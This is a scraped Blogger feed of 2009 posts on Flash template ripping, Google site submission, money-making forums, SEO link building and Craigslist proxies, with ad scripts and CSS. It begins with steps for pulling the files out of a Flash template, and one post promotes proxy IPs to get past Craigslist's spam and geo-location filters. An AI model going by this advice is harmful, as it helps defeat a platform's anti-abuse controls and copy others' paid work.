<span style="font-size: x-small;"><br />
</span><br />
<span style="font-size: x-small;">6. Copy the first error, example: "7045_main.html" then go back to your browser and replace the 7045.swf to 7045_main.html press enter and you'll see a lot of text... nonsense text icon_lol.gif that text are your contents...</span><br />
<span style="font-size: x-small;"><br />
</span><br />
<span style="font-size: x-small;">NOTE: when you save the remaining files dont forget to save with underscore sign (_) in the front on the file without the TM item number (e.g. 7045) if it is html save it as "_main.html" and same with the image save it as "_works1.jpg" save them where you save the FLA and SWF files. Continue browsing the file inside Flash application so you can track the remaining files... do the same until you finish downloading all the remaining the files. </span><br />
<br />
<h2>Submit Website to Google Search Engine Index for Fast searchable</h2><br />
<div class="content"><div id="lw_context_ads"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjenJbTfJKx3DzGXXiRneYekOIepk07P8LfH3PBiX9v4kxGQ73LgGU0x04UBWOdUzks5UVcLLY_t_YIEOjpJRFg8o_SQUBffzHUxaCM2SRD_QuY_KUsFUAF_heUFTjLyyDqCM-4F9PlZLSp/s1600-h/Website+on+Google+Search+Engine+Index.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="Submit Website Google Search Engine Index searchable" border="0" id="BLOGGER_PHOTO_ID_5390607554513643314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjenJbTfJKx3DzGXXiRneYekOIepk07P8LfH3PBiX9v4kxGQ73LgGU0x04UBWOdUzks5UVcLLY_t_YIEOjpJRFg8o_SQUBffzHUxaCM2SRD_QuY_KUsFUAF_heUFTjLyyDqCM-4F9PlZLSp/s400/Website+on+Google+Search+Engine+Index.jpg" style="cursor: pointer; float: left; height: 151px; margin: 0pt 10px 10px 0pt; width: 222px;" /></a><span style="font-size: x-small;"><a href="http://eknol.blogspot.com/2009/02/how-to-increase-visibility-of-your-blog.html" style="font-weight: bold;">Google search engine</a> is most used search engine worldwide. And millions of blogs / websites are indexed by it day basis. So it will take time to Index newly formed website or blog. For faster Index we have to request that we are ready with our content and Index it. Create your website when it is ready just by simple steps add it to <a href="http://eknol.blogspot.com/2009/08/why-seo-is-important-for-search-engine.html" style="font-weight: bold;">Google index</a> as given in the below step.<br />
<br />
First some basis things to be considered before adding site to <a href="http://eknol.blogspot.com/2009/01/how-to-check-that-your-blogwebsite-is.html" style="font-weight: bold;">Google Search Engine Index</a>. Websites with high text will be considered fast. Make each and every Page of your website reachable from minimum one link. Now let’s add website to Google:-<br />
<br />
Visit web site submission page at this link to <a href="http://www.google.com/addurl/?continue=/addurl" rel="nofollow" target="_blank">http://www.google.com/addurl/?continue=/addurl</a> to submit your web site.<br />
</span><br />
<ol><li><span style="font-size: x-small;">Fill out the First empty box "URL" with full URL of your website means please include the http:// prefix. For example: http://www.yoursitename.com/</span></li>
<li><span style="font-size: x-small;">Next Leave comment you want to add to your Website.</span></li>
<li><span style="font-size: x-small;">Now come to last step of submission that will verify that you are a human not a robot.</span></li>
<li><span style="font-size: x-small;">Hit "Add URL" and our site is added.</span></li>
</ol><span style="font-size: x-small;">Check only after an interval of some day to see if your site has been indexed by going to Google and searching for it complete a long string of exact text that only your site has. Please be patient give some time to your website that will be indexed fully by <a href="http://eknol.blogspot.com/2009/09/reading-google-webmaster-guidelines-is.html" style="font-weight: bold;">Google</a> Search Engine Index.</span><br />
</div></div><span style="font-size: x-small;"><br />
</span><br />
<script type="text/javascript">
<!--
ch_client = "eblogtemplates";
ch_type = "rpu";
ch_noprice = "1";
ch_shufflequeries = 1;
ch_width = 468;
ch_height = 90;
ch_color_title = "2277DD";
ch_non_contextual = 1;
ch_nosearch = 1 ;
ch_font_title = "Arial";
ch_font_text = "Arial";
ch_sid = "langit-template";
var ch_queries = new Array( );
var ch_selected=Math.floor((Math.random()*ch_queries.length));
if ( ch_selected < ch_queries.length ) {
ch_query = ch_queries[ch_selected];
}
//-->
</script> <script src="http://scripts.chitika.net/eminimalls/mm.js" type="text/javascript">
</script><iframe allowtransparency="true" frameborder="0" height="90" hspace="0" marginheight="0" marginwidth="0" name="ch_ad792" scrolling="no" src="http://mm.chitika.net/minimall?w=468&h=90&client=eblogtemplates&noctxt=1&sid=langit-template&url=http%3A//hackernepal.blogspot.com/2009/10/how-to-rip-dynamic-flash-template.html&type=rpu&nosearch=1&noprice=1&cl_title=2277DD&fn_title=Arial&fn_text=Arial&ref=http%3A//hackernepal.blogspot.com/2009/10/how-to-change-your-boot-screen.html&shqueries=1&cb=792" vspace="0" width="468"></iframe><br />
<h2>Make Money Online Forums :- The Best of Revenue Sharing Forums</h2><br />
<span style="font-size: x-small;">Forums are the one of the best way who wants to <a href="http://eknol.blogspot.com/2009/06/make-money-online-with-paypal-donation.html">make money online</a>. Making Money online with forums is easy and interesting. if you are new and don't want to make a blog or website but have a huge knowledge of technically skill or writing skill then you can <a href="http://eknol.blogspot.com/2009/07/make-money-online-with-john-chows.html">make money online</a> with forums. Yes it is possible check out some of the below given revenue sharing forums.<br />
<br />
Meaning of Forum: - A public meeting or assembly for open discussion. Forums are used to discuss many things of our life whether it technically or it is personal on a large scale of gathering and anybody can participate in these discussions.<br />
<br />
Meaning of Revenue sharing Forums: - where you can make money with your affiliate links or affiliate advertisement display. These kind of forums or sites gives a option to add your affiliate links in profile and they show advertisement using your code when someone visit your discussion or work on a sharing percentage.<br />
<br />
List of Best <a href="http://eknol.blogspot.com/2009/06/make-money-online-with-infolinks-movie.html">Make Money Online</a> Forums:-<br />
</span><br />
<ol><li><span style="font-size: x-small;">DigitalPoint.com – Top of all web forums a great place for webmasters and for new comer in the money making world.</span></li>
<li><span style="font-size: x-small;">SeoChat.com – A complete solution for SEO (<a href="http://eknol.blogspot.com/2009/08/why-seo-is-important-for-search-engine.html">Search Engine optimization</a>) questions. Seochat is covered all about <a href="http://eknol.blogspot.com/2009/07/seo-tips-search-engine-optimization-seo.html">SEO</a> for blogging world with millions of intelligent skilled peoples.</span></li>
<li><span style="font-size: x-small;">WebMasterWorld.com – Covering all topics about the <a href="http://eknol.blogspot.com/2009/07/how-to-setup-google-adsense-code-below.html">Google adsense</a>. Provides information on optimization of Adsense and helps to increase money.</span></li>
<li><span style="font-size: x-small;">SitePoint.com – Everything covered for Internet and web related topics.</span></li>
<li><span style="font-size: x-small;">SearchEngineWatch.com – This forum is covering all topics about the search engine Google and provides discussions for making best of <a href="http://eknol.blogspot.com/2009/05/search-engine-optimization-seo-tip-for.html">SEO tips</a>.</span></li>
<li><span style="font-size: x-small;">V7n.com – Make a good <a href="http://eknol.blogspot.com/2008/11/take-test-of-your-template-design-in.html">design</a> of your blog/website get help from professional designers.</span></li>
<li><span style="font-size: x-small;">HtmlForums.com – Learn html, programming, graphics, e-commerce and more about web designing online.</span></li>
<li><span style="font-size: x-small;">Ozzu.com – Get professional advice for your hosting and maintaining a blog or website.</span></li>
<li><span style="font-size: x-small;">WebTalkForums.com – After web development we come to web promotion. This forum gives a handsome ideas and professional individuals who give tons of tips.</span></li>
<li><span style="font-size: x-small;">Devshed.com – Let’s test your programming skills or learn programming and development forum online for any kind of programming languages.</span></li>
</ol><span style="font-size: x-small;">So hope all of your must give a try to one of your kind forum and start Make Money Online Forums</span><br />
</div><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-11775651329872175062009-10-17T04:41:00.000-07:002009-10-17T04:41:01.452-07:00How to Get a Proxy IP CraigslistUnsure as to why anyone would need a <strong><a href="http://www.elite-proxy.net/" onclick="javascript:pageTracker._trackPageview('/outgoing/article_exit_link');" rel="nofollow"><strong>Proxy IP Craigslist</strong></a></strong> to post on Craigslist with? There are several very good reasons why you may need one. The cause of these reasons is how Craigslist has changed and evolved over the years as it has become the largest online classified website.<br />
<br />
The first reason you may need one is due to how Craigslist uses IPs to filter out unwanted ads. Craigslist, with the goal of reducing the amount of spammy ads, introduced several new filters that log IP activity of each ad. If there are an excessive number of ads being detected as coming from a single IP, this will trigger their spam filtering system and that IP will be blocked. If you've posted an ad but couldn't ever find it on Craigslist, then most likely this is the cause of your problem.<br />
<br />
The second reason someone may require a proxy to post on Craigslist with is that there are rumours that Craigslist has recently implemented a geo location spam filter. This new filter can possibly restrict you to posting ads in cities on Craigslist that are in the same area as your IP. Put simply, if are based in Detroit then ads you post in any area outside of Detroit won't be visible as they don't match your IP.<br />
<br />
Two main reasons anyone would need a <strong>Proxy IP Craigslist</strong> is to bypass the geo location filter and the original IP blocks that Craigslist continues to use. With the massive amounts of traffic has to offer, it makes sense that getting your own proxy is worth its weight in gold.<div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-35343108100875452292009-10-17T01:16:00.000-07:002009-10-20T01:57:57.321-07:00seo tips and tricks(5)<div style="color: blue; text-align: justify;"> <br />
<div class="entry-title" style="color: #990000;"> <h1>Better earning Better Link Popularity</h1></div></div><div id="menu" style="color: blue; text-align: justify;"><div class="menu1 section" id="menu1"></div></div><div id="crosscol-wrapper" style="color: blue; text-align: justify;"></div><div style="color: blue; text-align: justify;"><a href="http://www.blogger.com/post-edit.g?blogID=2254663475743620910&postID=3534310810087545229" name="3853870766889255471"></a> <br />
</div><div class="post_title" style="color: blue; text-align: justify;"><h2><span style="font-size: large;"><span style="font-size: small;"> </span></span></h2>Link popularity plays an important role to maximize traffic for your site. Popularity of a page is judged by the link popularity of the page. That means how many links have been directed to a particular page of your site. If the content of the page is attractive and have ample numbers of <a href="http://blogrns.blogspot.com/">inbound links</a>, certainly your website will touch the sky. If the page ranks from one to ten, number of visitors will be acquainted with your site and surely your expectation will be fulfilled. So you have to try your level best for link popularity. Link popularity plays an important role among the top of the search results in the various search engines such as <a href="http://www.google.com/">Google</a>, <a href="http://www.yahoo.com/">Yahoo!</a> Most of the search engines require at least one links coming to your website, otherwise your site will disappear from the search engine index.There are many ways and means through which you can built link popularity for your site.<br />
<br />
1. The most important thing for link popularity is to produce quality content. Every website publisher should be ensured that the site has really good contents. You have to maintain the guidelines to make a crawler friendly website. You can hire a content writer for your site. If the content of your site is helpful and information based, so many sites will direct their visitors to your site. Thus your link popularity will be increased.<br />
<br />
2. You can earn link popularity by exchanging your link. You may contact good quality sites for exchange link. First you have to give a link from your site. Then request the publisher with polite words asking for a link.<br />
<br />
3. Submit good quality article to free article sites such as <a href="http://www.articlerich.com/">articlesrich</a>. By submitting article you can get many inbound links. Suppose you have written a good article. Many websites will download your article which include a link to your site. Thereby you will get good number of inbound links. Learn Traffic By Articles for more information for article writing.<br />
<br />
4. Join various forums. In the forum you can ask a question or reply to a question. Whenever you ask a question or reply always try to give a link of your website. Don’t promote your site directly in the forum.<br />
<br />
5. Create link list in your website. Place important and relevant information based website link in your website.<br />
<br />
6. Try to create keyword oriented articles and reviews. Thus you can draw traffic to your site with little effort.<br />
<br />
7. You should keep in mind that your home page should contain links to all subpages so that search engines can transfer some links to other subpages.<br />
<br />
8. Try to get inbound links from sites with high page rank. If you get links from high ranked pages in the search result, certainly your page will rank high and your site will attracts lots of traffic.<br />
<br />
9. You can submit story to <a href="http://www.digg.com/">Digg</a> with a link to your site<br />
<br />
10. Your content should devoid of grammatical and spelling errors. Content should be split up with paragraphs.<br />
<br />
11. Your content should be easy to understand and interesting so that your visitors can follow your contents easily.<br />
<br />
12. You can review relevant products on various sites such as<a href="http://www.amazon.com/">Amazon.com</a><br />
<br />
13. Review relevant sites on <a href="http://www.alexa.com/">Alexa</a> to attract respective traffic.<br />
<br />
14. You may offer articles to other webmasters who are looking for relevant article. You can request for a link targeted to your site from the site. You may also include a link in your material itself.<br />
<br />
15. Keep a space in your site for members only. You can demand a free link to your site. More the number of members the more inbound links to your website. Consequently link popularity of your website will be increased and the resultant is high ranking in the search engine.<br />
<br />
16. Try to get your website listed in Yahoo! Or<a href="http://www.dmoz.org/"> DMOZ</a> directory. All the high ranking websites are included in DMOZ and Yahoo directory. These two directories are edited by human. There is no doubt that human can judge better than a search engines regarding the quality of a website<br />
<br />
17. Search suitable blog and make a comment. You can request the blog publisher for a link to your site. In this way you can develop your link popularity.<br />
<br />
18. Another easy way to built your link popularity is to ask or answer questions on <a href="http://groups.google.com/">Google Groups</a> and provide links to relevant resources.<br />
<br />
19. Claim your blog in Technorati. <a href="http://www.technorati.com/">Technorati</a> tag pages rank well in Yahoo! and MSN, You can get some links through technorati.<br />
<br />
20. You may ask question or reply on Yahoo! Answers and provide links to relevant resources. If you can follow the above instructions I can assure you that you will built link popularity for your site easily like this <a href="http://blogrns.blogspot.com/">blog</a> in not time and thus your website will be the top in the search engines and thousands of traffic will visit your site every day.<br />
<h2><span style="font-size: large;"><span style="font-size: small;"> </span></span></h2><h2 style="color: #990000;"><span style="font-size: large;"><span style="font-size: small;"> How To Build A High Ranking Ecommerce Website That Sells! </span></span></h2></div><div class="post_date" style="text-align: justify;"><br />
<br />
</div><table border="0" cellpadding="0" cellspacing="0" class="MainTable" height="4532" style="margin-left: 0px; margin-right: 0px; text-align: left; width: 470px;"><tbody>
<tr align="justify"></tr>
<tr align="justify"><td valign="top" width="76%"><div id="box2"><div id="lb2"><div id="rb2"><div id="bb2"><div id="blc2"><div id="brc2"><div id="tb2"><div id="tlc2"><div id="trc2"><div id="content2"><table border="0" cellpadding="5" cellspacing="0" style="margin-left: 0px; margin-right: 0px; text-align: left;"><tbody>
<tr> <td><img align="right" alt="" border="0" src="http://u.article99.com/img/thumbs/no-picture.gif" /><br />
</td> </tr>
</tbody></table><h1><span style="color: indigo;"><br />
</span></h1><div class="artSubHeader"><a class="artHeaderSM" href="http://www.article99.com/health-tips/"><b><br />
</b></a><br />
</div></div></div></div></div></div></div></div></div></div></div><img alt="" border="0" height="15" src="http://www.article99.com/images/spacer.gif" width="1" /><br />
<div id="box2"><div id="lb2"><div id="rb2"><div id="bb2"><div id="blc2"><div id="brc2"><div id="tb2"><div id="tlc2"><div id="trc2"><div id="content2"><table border="0" cellpadding="0" cellspacing="0" style="margin-left: 0px; margin-right: 0px; text-align: left;"><tbody>
<tr> <td width="308"><br />
</td> </tr>
</tbody></table><script type="text/javascript">
var dc_UnitID = 14;
var dc_PublisherID = 8724;
var dc_AdLinkColor = 'blue';
var dc_adprod='ADL';
var dc_open_new_win = 'yes' ;
var dc_single_line = 'no' ;
var dc_maxLinks='4';
</script> <script src="http://kona.kontera.com/javascript/lib/KonaLibInline.js" type="text/javascript">
</script><script language="JavaScript" src="http://konax.kontera.com/publisher_tail/generatedPublisherConfig.js?publisher_id=8724">
</script><script language="JavaScript" src="http://kona.kontera.com/javascript/lib/KonaBase.js?00000000416">
</script><style id="konaStyle" type="text/css">
span.kLink { border-top: 0px none !important;border-left: 0px none !important;border-right: 0px none !important;border-bottom: 1px solid ;padding : 0px 0px 1px 0px !important;color:blue;background: transparent none;width: auto !important;float: none !important;display:inline !important; }
a.kLink { color:blue !important ; border-bottom-style: none;text-decoration: underline;cursor: pointer;font-family: verdana;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
a.kLink:link { color:blue !important ; border-bottom-style: none;text-decoration: underline;cursor: pointer;font-family: verdana;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
a.kLink:hover { color:blue;text-decoration: underline;cursor: pointer;font-family: verdana;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
a.kLink:visited { color:blue;text-decoration: underline;cursor: pointer; font-family: verdana;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px; }
.sponsor { font-family: MS Sans Serif, Verdana; color: #AFAFAF;font-size: 9pt; cursor: default; }
.konaLayers { azimuth:center;border-collapse:separate;border-spacing:0;caption-side:top;cursor:auto;direction:ltr;elevation:level;empty-cells:show;font-size:medium;font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;list-style-image:none;list-style-position:outside;list-style-type:disc;orphans:2;page-break-inside:auto;pitch-range:50;pitch:medium;position:static;richness:50;right:auto;speak-header:once;speak-numeral:continuous;speak:normal;speech-rate:medium;stress:50;text-align:left;text-indent:0;text-transform:none;visibility:visible;volume:medium;white-space:normal;widows:2;word-spacing:normal; }
.konaLayers * { background-attachment:scroll;background-color:transparent;background-image:none;background-position:0% 0%;background-repeat:repeat;border-style: none none none none;border-width: medium medium medium medium;clear:none;color:inherit;content:normal;counter-increment:none;counter-reset:none;cue-after:none;cue-before:none;float:none;left:auto;letter-spacing:normal;margin: 0px 0px 0px 0px;max-height:none;max-width:none;min-height:0;min-width:0;outline-color:invert;outline-style:none;outline-width:medium;overflow:visible;padding:0px 0px 0px 0px;page-break-after:auto;page-break-before:auto;pause-after:0;pause-before:0;position:static;table-layout:auto;text-decoration:none;top:auto;unicode-bidi:normal;width:auto;z-index:auto; }
.konaLayers .konaLayer { position: absolute; top:0px; left:0px; width: 313px; padding: 0px; visibility: hidden; text-align:left; overflow: hidden; }
.konaLayers .konaLayer a { font-weight: normal;text-decoration:none;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
.konaLayers .konaLayer a:link { font-weight: normal;text-decoration:none;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
.konaLayers .konaLayer a:hover { font-weight: normal;text-decoration:none;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
.konaLayers .konaLayer b { font-size:inherit; }
a.CBL { cursor:default; }
a.CBL:link { cursor:default; }
a.CBL:hover { cursor:default; }
a.CBL:visited { cursor:default; }
.konaLayers .CBL .handleTd div { cursor:default; }
.konaLayers .konaPlate { cursor : pointer; }
.konaLayers .konaPlate .konaBox { background: url(http://kona.kontera.com/javascript/lib/imgs/top_box.gif) left top no-repeat;width: 313px; }
.konaLayers .konaPlate .konaBottomBox { width: 313px; height:45px; font-size: 3px; background: url(http://kona.kontera.com/javascript/lib/imgs/box_bottom.png) left top no-repeat; }
.konaLayers .konaPlate .konaBottomBox_Right { width: 313px; height:45px; font-size: 3px; background: url(http://kona.kontera.com/javascript/lib/imgs/box_bottom_right.png) left top no-repeat; }
.konaLayers .konaPlate .konaBottomBox_drag { width: 313px; height:20px; font-size: 3px; background: url(http://kona.kontera.com/javascript/lib/imgs/box_bottom_drag.png) top no-repeat; }
.konaLayers .handleTd { vertical-align: top; width: 180px; }
.konaLayers .handleTd div { cursor: move; padding: 0px 0px 0px 33px; font-size: 3px; }
.konaLayers .handleTd img { vertical-align:top; }
.konaLayers .frameBarCell_left { width:88px; vertical-align: top; padding: 0px 0px 0px 0px; }
.konaLayers .frameBarCell_right { width: 32px; vertical-align: top; padding-top: 0px; font-size: 5px; }
.konaLayers .frameBar { margin-left: 7px; margin-right: 6px; cursor:auto; width:300px; }
.konaLayers .konaDescDiv { cursor: pointer; padding-top: 2px; }
.konaLayers .table02 { margin-left: 9px; font: normal 13px arial; width: 305px; }
.konaLayers .table03 { margin-left: 8px; font: normal 13px arial; width: 280px; table-layout: fixed; }
.konaLayers .table03_flv02 { margin: 0px 0px 0px 32px; width: 242px; font: normal 13px arial; table-layout: fixed; }
.konaLayers .konaLayerTitle { text-align:center; padding-right: 10px; }
.konaLayers .konaLayerRMTitle { text-align:left; padding-right: 10px; padding-left: 6px; }
.konaLayers .konaLayerTitleText { font: bold 11px tahoma; color:#FFA200;; !important; text-decoration: underline;display:block; }
.konaLayers .konaLayerTitleText b { font-size : 11px; color: #FFA200; }
.konaLayers .konaLayerDesc { padding: 6px 7px 0px 0px; font: normal 11px verdana !important; color: BLACK; text-align: left; }
.konaLayers .konaLayerDescDownlod { padding: 6px 7px 0px 0px; vertical-align:top; font: normal 11px verdana !important; color: BLACK; text-align: left; }
.konaLayers .konaLayerDesc b { font-size : 11px; color: BLACK; }
.konaLayers .konaLayerLinks td { padding-top: 8px; }
.konaLayers .konaLayerShopLinks td { padding-top: 1px; font-size: 9px; }
.konaLayers .site { padding-left: 8px; overflow:hidden; }
.konaLayers .site a { color: #666666 !important; font: normal 11px arial !important; text-decoration: underline !important; overflow:hidden; }
.konaLayers .site a:hover { color: #FFA200 !important; }
.konaLayers .buyNow { text-align: right; width:105px; }
.konaLayers .konaLayer img { border: 0px;display:inline; padding:0px; }
.konaLayers .imgBanner { padding: 6px 13px 0px 6px; vertical-align: top; width:51px; text-align: center; }
.konaLayers .imgShoppingBanner { padding: 5px 4px 0px 3px; vertical-align: top; width: 51px; text-align: center; }
.konaLayers .imgBanner_down { padding: 5px 13px 0px 13px; vertical-align: top; width:51px; text-align: center; }
.konaLayers .top_curve { width: 313px; height: 10px; padding:0px; margin:0px;vertical-align:bottom;background: url(http://kona.kontera.com/javascript/lib/imgs/top_curve.png) left top no-repeat; }
.konaLayers .drop_top_curve { width: 313px; height: 35px;vertical-align:bottom;font-size: 3px;background: url(http://kona.kontera.com/javascript/lib/imgs/drop_top_curve.png) top no-repeat; }
.konaLayers .drop_top_curve_right { width: 313px; height: 35px; font-size: 3px;vertical-align:bottom;background: url(http://kona.kontera.com/javascript/lib/imgs/drop_top_curve_right.png) top no-repeat; }
.konaLayers .konaSearchRow td { padding-top: 2px; }
.konaLayers .konaSearchTable { margin-left: 5px; font: normal 13px arial; }
.KonaBody { display:inline; }
.konaLayers .table02_flv { margin-left: 10px; margin-top: 3px; margin-bottom: -4px; }
.konaLayers .table02_flv02 { margin-left: 34px; width: 234px; margin-top: 3px; }
.konaLayers .table02_flv03 { margin-left: 6px;margin-top: 3px; }
.konaLayers .konaLayer_flvTD01 { padding: 6px 6px 0px 6px; }
.konaLayers .konaLayer_flvTD02 { padding: 5px 6px 0px 6px; }
.konaLayers .konaLayer_flvEmbed01 { }
.konaLayers .konaLayer_flvEmbed02 { margin-bottom: -3px; }
.konaLayers .konaLayerDesc_nearFLV { font: normal 11px verdana !important; color: BLACK; text-align: left;vertical-align: top; padding: 11px 10px 0px 0px; }
.konaLayers .konaLayerDesc_underFLV { font: normal 11px verdana !important; color: BLACK; text-align: left;font: normal 11px/14px verdana !important; vertical-align: top; padding: 0px 0px 0px 6px; }
.konaLayers .konaLayerLearnMore { text-align:left; vertical-align: bottom; padding: 0px 0px 1px 6px; }
.konaLayers .konaLayerLearnMore02 { vertical-align: top; text-align:right;width: auto !important; padding: 4px 0px 0px 0px !important; }
.konaLayers .konaLayerDownload { vertical-align: top; text-align:right;width: 132px !important; padding: 4px 0px 0px 0px !important; }
.konaLayers .konaLayerLinks_underFLV td { padding-top: 0px; padding-bottom: 4px; line-height: 14px; }
.konaLayers .konaLayerLinks_underFLV02 td { padding-top: 4px; line-height: 14px; }
.konaLayers .konaFlashWrap { width: 320px; height: 288px; }
.konaLayers .konaFlashDrag { position:absolute;width:198px;height:26px;background-color:#ffffff;opacity:0;filter:alpha(opacity=0);cursor:move; }
.konaLayers .konaFlashContent { width: 320px; height: 288px; }
.konaLayers #konaFlashBubble { width: 320px; height: 288px; }
.konaLayers .konaBigFlashWrap { position:absolute;width:470px;height:395px; }
.konaLayers .konaBigFlashDrag { position:absolute;z-index:17;width:347px;height:24px;left:85px;top:5px;background-color:#ffffff;opacity:0;filter:alpha(opacity=0);cursor:move; }
.konaLayers .konaBigFlashContent { position:absolute;left:0;top:0;z-index:12;width:470px;height:395px; }
.konaLayers .konaInfocomSearchTD .konaLineInputTD { position:relative; }
.konaInfocomTableContainer { margin-left:21px; }
.konaInfocomSearchTD { background: url(http://kona.kontera.com/javascript/lib/imgs/konaInfocom_search_area_trans.gif); width: 270px; height:46px; }
.konaInfocomSearchTable { margin-top: 10px; margin-left:13px; width:244px; }
.konaInfocomSearchField { width:163px; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; background-color:#FFF;color:#000; border:1px inset #ccc; padding: 1px 0px; }
.konaInfocomInputContainer { position:relative; width: 163px; text-align: left; overflow: hidden; }
.konaLayers .konaFlashWrap { position:relative; }
.konaLayers .konaExpandFlashWrap { position:relative; }
.konaLayers .konaFlashDrag { z-index:100;position:absolute;width:198px;height:26px;background-color:#ffffff;opacity:0;filter:alpha(opacity=0.0);cursor:move;top:0px; }
.konaLayers .konaExpandFlashContent { }
.konaLayers .konaExpandFlashIframe { /*background:yellow;*/z-index:9999;position:absolute; }
.konaLayers .konaWebnaryGradientTD .konaLineInputTD { position:relative; width: 200px }
.konaWebnaryGradientTD { background:url(http://kona.kontera.com/javascript/lib/imgs/konaWebnaryGrad.gif) repeat-x; height:39px; width:300px; }
.konaWebnaryTable { width: 300px; height:112px; margin-left:7px; margin-top:3px }
.konaWebnaryHeadTD { width: 300px; height:51px; }
.konaWebnarySubTD { width: 300px; height:22px; }
.konaWebnarySearch { width:280px; height:23px; margin: 3px 0 0 10px; }
.konaWebnaryInput { width: 200px; font: 12px Verdana, Arial, Helvetica, sans-serif; background-color:#FFF;color: black; border:1px inset #ccc; padding: 1px 0px; }
.konaWebnarySubmit { margin-left:5px; }
.konaWebnaryInputContainer { position:relative; width: 200px; text-align: left; overflow: hidden; }
.konaLayers .konaFDGradientTD .konaLineInputTD { position:relative; width: 193px }
.konaFDGradientTD { background:url(http://kona.kontera.com/javascript/lib/imgs/konaFDbottom.gif); height:39px; width:300px; }
.konaFDTable { width: 300px; height:112px; }
.konaFDHeadTD { width: 300px; height:55px; }
.konaFDSubTD { width: 300px; height:20px; }
.konaFDSearch { width:280px; height:23px; margin: 3px 0 0 10px; }
.konaFDInput { width: 193px; font: 12px Verdana, Arial, Helvetica, sans-serif; background-color:#FFF;color: black;border:1px inset #ccc; padding: 1px 0px; }
.konaFDSubmit { margin-left:5px; }
.konaFDInputContainer { position:relative; width: 193px; text-align: left; overflow: hidden; }
.konaYahooShoppingTable { width: 288px; height:125px; border: none; margin-left: 12px; margin-top: 5px; background-image:url(http://kona.kontera.com/javascript/lib/imgs/konaYahooSbgWhite.gif); }
.konaYahooShoppingTable2 { width: 288px; border: none; margin-left: 12px; }
.konaYahooShoppingHeader { height: 31px; font-family:Verdana, Arial, Helvetica, sans-serif; padding-bottom: 0px; vertical-align:middle; text-align:center; }
.konaLayers .konaLayer a.konaYahooShoppingTitle { font-size:11px; font-weight:bold; color: #000000; text-decoration:underline; cursor:default; }
.konaYahooShoppingContentTable { border: none; padding:0; }
.konaYahooShoppingImageTd { padding-top:6px; padding-right:0px; padding-left:12px; padding-bottom:0px; vertical-align:top; }
.konaLayers .konaLayer .konaYahooShoppingImg { border:solid 1px; border-color: #808080; }
.konaYahooShoppingPrice { padding-bottom:5px; padding-right: 7px; }
.konrYahooShoppingFont { font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; color: #000000; }
.konaYahooShoppingText { width: 177px; padding-left: 5px }
.konaYahooShoppingDescriptionTable { height: 80px; }
.konaYahooShoppingDescriptionTd { vertical-align: top; }
.konaYahooShoppingDescription { margin:0; padding: 3px 3px 7px 2px; text-align:left; vertical-align:top; line-height:1.5; }
.konaYahooSecondTable { background-image:url(http://kona.kontera.com/javascript/lib/imgs/konaYahooSbgMiddle2.gif); width:100%; border: none; }
.konaYahooSecondTableLinkTD { padding-left:15px; vertical-align:bottom; }
.konaLayers .konaLayer a.konrYahooLink1 { color:#0170b3; font-size:10px; text-decoration: underline; font-family: verdana,sans-serif; }
.konaYahooSecondTableButtonTD { float:right; vertical-align:bottom; }
.konaYahooShoppingBuyNowImg { margin-right: 5px; float:right; border:none; }
.konaYahooShoppingBottomTd { padding:0px; vertical-align:top; }
.konaYahooShoppingBottomImg { padding:0; margin:0; }
.konaYahooShoppingPoweredImg { margin:5px 0 0 0; padding:0; }
.konaLayers .konaBox_bottom { background: url(http://kona.kontera.com/javascript/lib/imgs/box_separator.gif) left top no-repeat; width: 313px; height: 10px; font-size: 1px; }
.konaLayers .konaBox02 { background: url(http://kona.kontera.com/javascript/lib/imgs/box.gif) left top no-repeat; width: 313px; padding-top: 7px; }
.konaLayers .konaLayer .konatabs_Search { margin: 0px 0px 0px 16px; width: 280px; padding: 0px; text-align: left; background: url(http://kona.kontera.com/javascript/lib/imgs/tabs_bg.gif) bottom repeat-x; }
.konaLayers .konaLayer .konatabs_Table td { padding-right: 4px; }
.konaLayers .konaLayer .konatabs_Table div { height: 18px; padding: 0px ; text-align: center; background: url(http://kona.kontera.com/javascript/lib/imgs/tab_right.gif) bottom right no-repeat; }
.konaLayers .konatabs_Table div span { display:block; height: 15px; padding: 3px 7px 0px 9px; text-align: center; background: url(http://kona.kontera.com/javascript/lib/imgs/tab_left.gif) bottom left no-repeat; color: #808080; font: normal 11px arial; cursor: pointer; }
.konaLayers .konaLayer .konatabs_Table div.selected { background: url(http://kona.kontera.com/javascript/lib/imgs/tab_selected_right.gif) bottom right no-repeat; cursor: default; }
.konaLayers .konatabs_Table div.selected span { background: url(http://kona.kontera.com/javascript/lib/imgs/tab_selected_left.gif) bottom left no-repeat; font: bold 11px arial; color: #96BF00; cursor: default; }
.konaLayers .konaSearch_Form { margin: 6px 0px 0px 15px; }
